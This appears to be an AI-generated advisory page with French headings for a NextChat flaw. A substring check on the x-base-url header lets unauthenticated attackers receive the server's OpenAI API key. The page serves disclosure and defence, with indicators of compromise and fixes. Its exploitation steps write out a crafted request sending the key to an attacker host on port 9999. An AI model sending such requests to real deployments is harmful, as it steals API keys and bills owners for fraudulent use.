CVE-2026-82639: 
NextChat Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-82639 is an improper URL validation vulnerability in NextChat (ChatGPTNextWeb) versions 2.15.8 through 2.16.1 that allows unauthenticated remote attackers to exfiltrate the server's configured OpenAI API key. The flaw resides in the proxy endpoint (app/api/proxy.ts), where the x-base-url header is validated using a substring check (String.prototype.includes()) rather than proper hostname parsing, enabling bypass via crafted URLs. It was reported on June 2, 2026, publicly disclosed via GitHub issue on July 5, 2026, and published to the NVD and GitHub Advisory Database on August 30, 2026. The vulnerability carries a CVSS v3.1 score of 7.5 (High) and a CVSS v4.0 score of 8.7 (High) (Github Advisory, NextChat Issue).

Détails techniques

The root cause is improper input validation (CWE-20) in app/api/proxy.ts (lines 37–46), where the code uses baseUrl?.includes("api.openai.com") — a plain substring containment check — to determine whether to inject the server's OPENAI_API_KEY into the outgoing Authorization header (NextChat Issue, proxy.ts source). Because this check does not parse the URL hostname, an attacker can supply values such as http://attacker.com?q=api.openai.com, http://attacker.com/path/api.openai.com/anything, or http://attacker.com#api.openai.com to satisfy the check while directing the server-side request to an attacker-controlled host. No authentication is required to reach this endpoint — the proxy handler performs no access-code or credential verification before injecting the API key. The correct fix is to parse the URL and compare the hostname directly: new URL(baseUrl).hostname === "api.openai.com". CodeQL query js/incomplete-url-substring-sanitization independently flags this code path (NextChat Issue).

Impact

Successful exploitation allows an unauthenticated attacker to steal the deployment's OPENAI_API_KEY in plaintext via a single crafted HTTP request, enabling arbitrary OpenAI API calls at the victim's expense. The impact is limited to confidentiality — there is no direct integrity or availability impact on the NextChat server itself — but the stolen key can be used for financial fraud (unauthorized API usage billed to the owner), data exfiltration via OpenAI APIs, or further attacks against OpenAI-integrated services. Access-code protection (CODE environment variable) does not mitigate this vulnerability, as the proxy endpoint bypasses authentication entirely, meaning all self-hosted NextChat deployments with OPENAI_API_KEY configured are at risk (NextChat Issue, Github Advisory).

Exploitabilité

A public proof-of-concept exploit is available as a GitHub issue with a detailed, step-by-step attack sequence including the exact HTTP request format and expected output (NextChat Issue). The exploit requires no authentication, no user interaction, and no special privileges, and has been assessed as automatable by NVD SSVC. The EPSS score is approximately 0.298% (22nd percentile), indicating a relatively low but non-negligible probability of exploitation in the wild within 30 days (Github Advisory). There is no current evidence of in-the-wild exploitation or threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog as of the time of this report.

Étapes d’exploitation

  1. Reconnaissance: Identify internet-facing NextChat instances running versions 2.15.8 through 2.16.1 (e.g., via Shodan searching for the NextChat web interface on port 3000) with OPENAI_API_KEY configured — the standard setup for self-hosted deployments.
  2. Set up a listener: Deploy an attacker-controlled HTTP server (e.g., a simple Flask app) that logs all incoming request headers, listening on a publicly accessible port (e.g., port 9999).
  3. Craft the malicious request: Construct an HTTP GET request to the NextChat proxy endpoint with a crafted x-base-url header that embeds api.openai.com as a substring while pointing to the attacker's server:
    GET /api/anyprov/testpath HTTP/1.1
    Host: <target>:3000
    x-base-url: http://<attacker-host>:9999?q=api.openai.com
  4. Send the unauthenticated request: Transmit the request to the target NextChat instance — no credentials or access code are required, as proxy.ts performs no authentication check.
  5. Receive the exfiltrated API key: The NextChat server evaluates baseUrl.includes("api.openai.com") as true, injects Authorization: Bearer <OPENAI_API_KEY> into the outbound request, and forwards it to the attacker's server. The attacker's listener receives the full API key in plaintext:
    {"headers": {"Authorization": "Bearer sk-proj-<ACTUAL_OPENAI_API_KEY>", ...}}
  6. Abuse the stolen key: Use the exfiltrated API key to make arbitrary OpenAI API calls at the victim's expense, or chain into further attacks (NextChat Issue).

Indicateurs de compromis

  • Network: Outbound HTTP requests from the NextChat server to unexpected external hosts (non-api.openai.com destinations) originating from the proxy handler; unusual connections to attacker-controlled IPs on non-standard ports (e.g., 9999) carrying an Authorization: Bearer sk-proj-... header.
  • Logs: NextChat server logs showing [Proxy Route] entries for requests to /api/<provider>/<path> endpoints with x-base-url header values that do not match https://api.openai.com exactly (e.g., containing api.openai.com as a query parameter or path fragment); repeated unauthenticated requests to the proxy endpoint from a single IP.
  • API Usage: Unexpected or anomalous OpenAI API usage spikes or billing charges not correlated with legitimate user activity, indicating the stolen key is being used externally (NextChat Issue, Github Advisory).

Atténuation et solutions de contournement

The primary remediation is to upgrade NextChat to a version newer than 2.16.1, which addresses the flawed substring validation (Github Advisory). As a code-level fix, the x-base-url validation in proxy.ts should be replaced with proper URL hostname parsing: new URL(baseUrl).hostname === "api.openai.com" instead of baseUrl?.includes("api.openai.com") (NextChat Issue). As interim workarounds, operators should implement network egress controls to restrict outbound connections from the NextChat server to only api.openai.com, monitor proxy endpoint access logs for anomalous x-base-url values, and consider rotating the OPENAI_API_KEY if exposure is suspected.

Réactions de la communauté

The vulnerability was assigned by VulnCheck and published to the GitHub Advisory Database on August 30, 2026 (Github Advisory). It was referenced in a CISA weekly bulletin (SB26-243) and picked up by several vulnerability tracking platforms including VulnDB, ENISA EUVD (EUVD-2026-68215), and INCIBE-CERT shortly after disclosure. The original reporter noted that a prior security advisory (GHSA-rfph-4473-623x) had received no response from the maintainers before the public issue was filed, suggesting delayed vendor engagement (NextChat Issue).

Ressources additionnelles


Source: Ce rapport a été généré à l’aide de l’IA

Apparenté NextChat Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-82639HIGH8.7
  • NextChat logoNextChat
  • cpe:2.3:a:nextchat:nextchat
NonNonAug 30, 2026
CVE-2026-105238MEDIUM5.5
  • NextChat logoNextChat
  • cpe:2.3:a:nextchat:nextchat
NonNonOct 05, 2026
CVE-2026-7644MEDIUM5.5
  • NextChat logoNextChat
  • cpe:2.3:a:nextchat:nextchat
NonNonMay 02, 2026
CVE-2026-7178MEDIUM5.5
  • NextChat logoNextChat
  • cpe:2.3:a:nextchat:nextchat
NonNonApr 27, 2026
CVE-2026-7643LOW2.1
  • NextChat logoNextChat
  • cpe:2.3:a:nextchat:nextchat
NonNonMay 02, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités